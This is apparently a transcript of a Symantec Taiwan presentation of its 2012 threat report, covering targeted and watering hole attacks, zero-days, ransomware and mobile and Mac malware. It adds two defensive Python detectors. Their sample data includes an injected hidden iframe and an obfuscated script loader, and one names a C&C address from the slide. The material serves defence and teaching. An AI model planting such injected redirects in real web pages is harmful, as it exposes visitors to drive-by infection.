TRANSCRIPT
Symantec Internet Security Threat Report
Volume 18
Speaker: 張士龍, Senior Technical Consultant, Symantec Taiwan
2012 Internet Security Threat Landscape I
Small businesses are the new target for attackers
• Targeted attacks rose by more than 40% (42%)
• Roughly one third (31%) of targeted attacks aimed at businesses with fewer than 250 employees
• The share of targeted attacks hitting businesses with fewer than 250 employees grew from 18% in 2011 to 31% in 2012
2012 Internet Security Threat Landscape II
Attacker groups are all around
• Elderwood is a group that has emerged over the past three years; some attacker groups are no longer motivated purely by commercial gain
• Targeting is becoming more precise and the techniques more sophisticated
• The emerging watering hole attack can cause large-scale damage in a short time
2012 Internet Security Threat Landscape III
The biggest threat to mobile devices is not vulnerabilities but malware
• Mobile malware grew by 58%
• The ratio of malware families to variants rose dramatically, from 1:5 to 1:38
• Mobile operating system vulnerabilities also jumped, from 315 in 2011 to 415 last year, growth of more than 30% (31%). For now the vulnerability count appears unrelated to malware volume, but there is no guarantee these vulnerabilities will not be exploited in the future
• More than half of mobile malware is designed to steal information and track the user's activity; the ultimate goal is profit
2012 Internet Security Threat Landscape IV
Macs are no longer safe
• Mac malware families grew from 6 in 2011 to 10 in 2012, an increase of about two thirds
• Only 2.5% of the threats found on Macs are malware written specifically for the Mac; yet a single threat infected as many as 600,000 Macs!
Report highlights
• Targeted attacks
• Vulnerability exploitation
• Mobile malware
• Mac security threats
Internet Security Threat Report 2013 :: Volume 18
Targeted attacks
Targeted attacks in 2012 increased by 42%
Small businesses are the new target for attackers
Share of targeted attacks by organization size, 2012:
  2,501 or more employees   50%
  1,501 to 2,500             9%
  1,001 to 1,500             2%
  501 to 1,000               3%
  251 to 500                 5%
  1 to 250                  31% (18% in 2011)
Organizations with 2,500 or fewer employees together account for the other 50%.
Manufacturing rose to first place among targeted-attack targets
[Chart: distribution of targeted attacks by industry, 2012. Manufacturing leads with 24%; the next two sectors hold 19% and 17%; every other sector accounts for 10% or less.]
Change in the distribution of targeted attacks by job function
Attacks are becoming more precise and the scale of damage larger
  Watering hole attack: compromise a website and wait for the users to take the bait
  Spear phishing: send email directly to the targeted individuals
What is a watering hole attack?
1. The attacker profiles the websites the intended victims habitually visit
2. The attacker probes those websites for vulnerabilities
3. After compromising the web server, the attacker injects JavaScript or HTML that redirects visitors so that malicious code runs on their machines
4. The compromised web server then waits, serving a zero-day exploit to the victims who take the bait
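Step 3 above is where a site owner can catch the attack before any visitor does: the injected redirect lives in the HTML the server now serves. The scanner below is an added example, not code from the Symantec report or from any Symantec product. It walks a page with the standard library's HTML parser and flags the three injection patterns step 3 describes: a script or frame loaded from a host outside an assumed allow list (TRUSTED_HOSTS), a zero-size or hidden iframe, and inline JavaScript using the decoding tricks redirectors use to hide their target. The allow-listed hosts and the two sample pages are constructed for illustration.

```python
"""Integrity check for a site's own HTML: flag injected script/iframe redirects
of the kind watering hole attackers plant on a compromised web server.

Added example, not code from the Symantec report. TRUSTED_HOSTS and the two
sample pages are constructed for illustration."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the site legitimately loads active content from (assumed allow list).
TRUSTED_HOSTS = {"www.example-site.org", "cdn.example-site.org"}

# Constructs typical of injected redirectors: decoding helpers that hide the
# real URL, document.write of a new tag, and hard location changes.
SUSPICIOUS_JS = re.compile(
    r"eval\s*\(|unescape\s*\(|String\.fromCharCode|document\.write\s*\(|"
    r"window\.location(?:\.href)?\s*=",
    re.IGNORECASE,
)


class InjectionScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []      # list of (kind, evidence) tuples
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)         # attribute names arrive lower-cased
        if tag == "script":
            self._in_script = True
            if a.get("src"):
                self._check_src("script", a["src"])
        elif tag == "iframe":
            if a.get("src"):
                self._check_src("iframe", a["src"])
            # A 0x0 or hidden frame has no legitimate display purpose; it is
            # the classic drive-by vehicle for loading an exploit page.
            style = (a.get("style") or "").replace(" ", "").lower()
            if (a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
                    or "display:none" in style or "visibility:hidden" in style):
                self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = re.search(r"url\s*=\s*(\S+)", a.get("content", ""), re.IGNORECASE)
            if m:
                self._check_src("meta-refresh", m.group(1))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # html.parser hands inline <script> bodies to handle_data verbatim
        if self._in_script and SUSPICIOUS_JS.search(data):
            self.findings.append(("obfuscated-inline-script", data.strip()[:60]))

    def _check_src(self, kind, src):
        # Relative paths have no host and belong to the site; absolute and
        # protocol-relative URLs must point at an allow-listed host.
        host = urlparse(src).hostname
        if host and host.lower() not in TRUSTED_HOSTS:
            self.findings.append((f"offsite-{kind}", src))


def scan_html(html):
    """Return the list of (kind, evidence) findings for one page."""
    p = InjectionScanner()
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample: the site's genuine page, then the same page after an
# attacker appended a hidden iframe and an obfuscated script loader.
CLEAN_PAGE = """<html><head>
<script src="/js/app.js"></script>
<script src="https://cdn.example-site.org/lib.js"></script>
</head><body><h1>Developer forum</h1></body></html>"""

INJECTED_PAGE = CLEAN_PAGE.replace("</body>", """
<iframe src="http://198.51.100.23/counter.php" width="0" height="0"></iframe>
<script>document.write(unescape('%3Cscript src=%22//198.51.100.23/j.js%22%3E%3C/script%3E'));</script>
</body>""")

if __name__ == "__main__":
    for finding in scan_html(INJECTED_PAGE):
        print(*finding)
```

Run against a fresh fetch of each page on a schedule and diff the findings against the previous run; a new off-site host or a hidden frame appearing on a page that was clean yesterday is the signal that the server itself has been compromised, regardless of which exploit the attacker will serve next.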
Watering hole attacks can cause large-scale damage in a short time
A single watering hole attack can infect 500 companies within 24 hours
Watering hole attack cases
• Watering hole attacks will be widely used in 2013
• In February this year several well-known companies fell victim to watering hole attacks
Watering hole attack targeting iOS developers
Watering hole case: combined with a Java zero-day (CVE-2013-1493)
Infection chain shown on the slide:
1. The victim requests a web page from the compromised ("water hole") web server
2. The server delivers a .jar file that exploits CVE-2013-1493
3. The exploit requests svchost.jpg
4. svchost.jpg, the payload disguised as an image, is returned
5. The payload is installed as appmgmt.dll and runs under svchost
6. The infected host contacts the C&C server at 110.173.55.187
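Each hop of the chain above leaves a line in the corporate web proxy, and the sequence is more telling than any single request. The detector below is an added example, not code from the Symantec report or from a Symantec product: it groups proxy records by client, looks for a successful .jar download followed within a short window by an "image" fetched by a Java user agent (browsers fetch images, the Java runtime does not, so svchost.jpg requested by Java is the payload), and then for any later request to the C&C address from the slide. The log format, host names, client addresses and the five-minute window are constructed assumptions; only the file names and 110.173.55.187 come from the slide.

```python
"""Correlate web-proxy log lines into the watering hole infection chain shown
on the slide: page visit, .jar served, Java fetches a payload named like an
image, then the host contacts the C&C address.

Added example, not code from the Symantec report. The log format, host names
and client addresses are constructed; only the file names and the C&C address
110.173.55.187 come from the slide."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

CNC_ADDRESSES = {"110.173.55.187"}   # from the slide
WINDOW = timedelta(minutes=5)         # assumed: payload follows the .jar quickly

# Constructed line format: <iso-timestamp> <client> <method> <url> <status> "<user-agent>"
LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) '
    r'(?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)


def parse(line):
    """Parse one log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    rec["host"] = re.sub(r"^https?://", "", rec["url"]).split("/")[0].split(":")[0]
    return rec


def detect_chain(lines):
    """Return {client: [alerts]} for clients whose traffic shows the chain."""
    per_client = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec:
            per_client[rec["client"]].append(rec)

    alerts = {}
    for client, recs in per_client.items():
        recs.sort(key=lambda r: r["ts"])
        found = []
        jars = [r for r in recs if r["url"].lower().endswith(".jar") and r["status"] == "200"]
        for jar in jars:
            # Stage 2: browsers load images, the Java runtime does not. An
            # "image" fetched by a Java user agent right after a .jar is the
            # payload in disguise (svchost.jpg on the slide).
            imgs = [r for r in recs
                    if jar["ts"] < r["ts"] <= jar["ts"] + WINDOW
                    and r["ua"].startswith("Java/")
                    and re.search(r"\.(jpe?g|gif|png)$", r["url"], re.IGNORECASE)]
            if not imgs:
                continue
            found.append(f"jar->image payload: {jar['url']} then {imgs[0]['url']}")
            # Stage 3: any later request to a known C&C address confirms the
            # payload ran on the host.
            cnc = [r for r in recs if r["ts"] > imgs[0]["ts"] and r["host"] in CNC_ADDRESSES]
            if cnc:
                found.append(f"C&C contact: {cnc[0]['method']} {cnc[0]['url']}")
        if found:
            alerts[client] = found
    return alerts


# Constructed sample log: one victim of the chain and one legitimate applet user.
SAMPLE_LOG = [
    '2013-03-01T10:02:11 10.0.0.12 GET http://devforum.example/index.html 200 "Mozilla/5.0"',
    '2013-03-01T10:02:12 10.0.0.12 GET http://devforum.example/ads/x.jar 200 "Mozilla/5.0 Java/1.7.0_15"',
    '2013-03-01T10:02:14 10.0.0.12 GET http://devforum.example/ads/svchost.jpg 200 "Java/1.7.0_15"',
    '2013-03-01T10:03:01 10.0.0.12 POST http://110.173.55.187/reg.php 200 "Mozilla/4.0"',
    '2013-03-01T10:05:00 10.0.0.40 GET http://intranet.example/app/tool.jar 200 "Mozilla/5.0 Java/1.7.0_15"',
    '2013-03-01T10:05:01 10.0.0.40 GET http://intranet.example/app/logo.png 200 "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, found in detect_chain(SAMPLE_LOG).items():
        print(client, *found, sep="\n  ")
```

The jar-then-image rule fires even when the C&C address is unknown, which matters for a zero-day campaign: the indicator list is empty on day one, but the behaviour of the Java plug-in downloading a "picture" is already anomalous. The second client in the sample fetches a legitimate applet and a real logo through the browser and is not flagged.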
Vulnerability exploitation
Zero-day vulnerabilities
[Chart: total zero-day vulnerabilities per year, 2006 to 2012: 13, 15, 9, 12, 14, 8, 14. The portions attributed to Stuxnet (2010) and to the Elderwood group (2012) are highlighted.]
• A single group can significantly affect the number of vulnerabilities in a year
• Elderwood is the main reason for the growth in zero-day vulnerabilities
No significant change in the number of vulnerabilities
Web-based attacks grew by 30%
Many websites put their users at risk
53% of legitimate websites have unpatched vulnerabilities
24% of websites have critical unpatched vulnerabilities
61% of malicious websites are legitimate sites that have been compromised
A single threat infected more than 1 million websites! It posed as antivirus software
Liza
Next time, what you run into could be ransomware!
Pay up, or the hostage is killed
Ransomware continues to run rampant
Important files on the computer are maliciously locked
Ransomware
• 16 criminal groups are involved in this type of cybercrime
• Victims were extorted for a total of roughly NT$150 million last year
• A single threat generates on average 500,000 attacks over an 18-day cycle
Mobile malware
Android malware growth
[Chart: cumulative Android malware families and cumulative Android variants, 2011 to 2012; vertical axis 0 to 5,000]
The ratio of malware families to variants rose from 1:5 to 1:38
The number of vulnerabilities is unrelated to the amount of mobile malware
Although there is no clear relationship between the number of mobile operating system vulnerabilities and the amount of malware, this may change in the future

Operating system    Vulnerabilities
Apple iOS           387
Android             13
BlackBerry          13
Windows Mobile      2

Device type         Malware (count)
Apple iOS           1
Android             103
Symbian             3
Windows             1
What mobile malware is designed to do
• Steal information
• Traditional threats
• Track the user
• Send messages
• Malicious advertising
• Change device settings
Information-stealing malware
Example: Android.Sumzand
1. The user receives an email containing an application download
2. The application steals the contact list
3. It then sends an email promoting the application download to every contact
Fake antivirus software
Mac security threats
Mac malware families surged
Judging by malware counts alone, using a Mac seems safer...
Only 2.5% of threats found on Macs are Mac malware
But in 2012, 1 Mac threat infected 600,000 machines.
Compared with PC malware, malware targeting the Mac has been more destructive!
Internet Security Threat Report 17
How enterprises should protect themselves
Symantec Defenses
Advanced Persistent Threats: Cutting Through the Hype
Detect, Prevent, Monitor and Analyze
• Protect endpoints from malware and data loss. Provide strong authentication to ensure the user and devices are trusted.
• Protect critical servers and systems with sensitive data.
• Provide global and local threat intelligence and correlation through threat monitoring and reporting services.
• Stop inbound malware attacks, outbound callbacks, and data loss at the gateway.
Products mapped to these layers on the slide:
• Managed Security Services (MSS)
• Symantec Security Assessment Services
• DeepSight Intelligence Services
• Managed PKI
• VIP Authentication Service
• Skeptic
• Attachment Filtering
• Endpoint Protection
• Network Access Control
• VIP Client
• Mobile Management
• Endpoint Protection Mobile Edition
• DLP for Tablet
• Critical System Protection
• Endpoint Protection
• Control Compliance Suite
• DLP Protection
• File/Email Encryption
• Altiris Management Suite
• Security Information Manager
• Mail Security for Exchange/Domino
• Two-factor Authentication
• Protection Center
• Endpoint Protection
• DLP Endpoint Prevention
• Endpoint Encryption
• Control Compliance Suite
• Altiris Management Suite
Malware protection
Layered Endpoint Protection
• Use more than just AV: use the full functionality of endpoint protection, including heuristics, reputation-based, behavior-based and other technologies
• Restrict removable devices and turn off auto-run to prevent malware infection
Security Awareness Training
• Ensure employees become the first line of defense against socially engineered attacks, such as phishing, spear phishing and other types of attacks
Advanced Reputation Security
• Detect and block new and unknown threats based on global reputation and ranking
Layered Network Protection
• Monitor globally for network intrusions, propagation attempts and other suspicious traffic patterns, including using reputation-based technologies
• Network protection is more than just blacklisting
Targeted attack protection
Advanced Reputation Security
• Detect and block new and unknown threats based on global reputation and ranking
Employ Offensive Protection Strategies
• Use true host-based intrusion detection and prevention technologies to set strong permissions around applications, servers and clusters, according to the sensitivity of the information processed
Removable Media Device Control
• Restrict removable devices and functions to prevent malware infection
Email & Web Gateway Filtering
• Scan and monitor inbound/outbound email and web traffic and block accordingly
Data Loss Prevention
• Discover data spills of confidential information that are targeted by attackers
• Detect and prevent exfiltration of confidential information that is targeted by attackers
Encryption
• Create and enforce security policies so that all confidential information is encrypted
Network Threat and Vulnerability Monitoring
• Monitor globally for network intrusions, propagation attempts and other suspicious traffic patterns, including using reputation-based technologies
Data breach protection
Data Classification
• Determine what sensitive information exists in your organization
• Categorize it appropriately and protect it according to its classification level
Data Loss Prevention
• Detect and prevent exfiltration of sensitive information that is targeted by attackers
• Enforce rules prohibiting access to confidential data by unauthorized applications
Host-based Intrusion Detection and Prevention
• Locks down key systems that contain confidential information
• Prevents any unauthorized code from running, independent of AV signatures
Email & Web Gateway Filtering
• Scan and monitor inbound/outbound email and web traffic and block accordingly
Encryption
• Create and enforce security policy so that all confidential information is encrypted
Strong Authentication
• Use two-factor authentication to protect against credential theft
Mobile threat protection
Device Management
• Remotely wipe devices in case of theft or loss
• Update devices with applications as needed without physical access
• Get visibility and control of devices, users and applications
Device Security
• Guard mobile devices against malware and spam
• Prevent the device from becoming a vulnerability
• Enforce compliance across the organization, including security standards and passwords
Content Security
• Identify confidential data on mobile devices and use technologies to prevent future exposure
• Protect data from moving between applications
• Encrypt mobile devices to prevent lost devices from turning into lost confidential data
Identity and Access
• Provide strong authentication and authorization for access to enterprise applications and resources
• Ensure safe access to enterprise resources from the right devices with the right postures
Enterprise security recommendations
• Adopt a defense-in-depth strategy: strengthen each layer of defense so that the layers complement one another and a failure at any single point does not compromise security.
• Network: strengthen web security and traffic inspection and analysis.
• Servers: build the capability to analyze anomalous behavior.
• Endpoints: automated endpoint protection (standardized inspection).
• Strengthen management of client devices and security education for users.
Thank you!
Copyright © 2010 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners. This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice.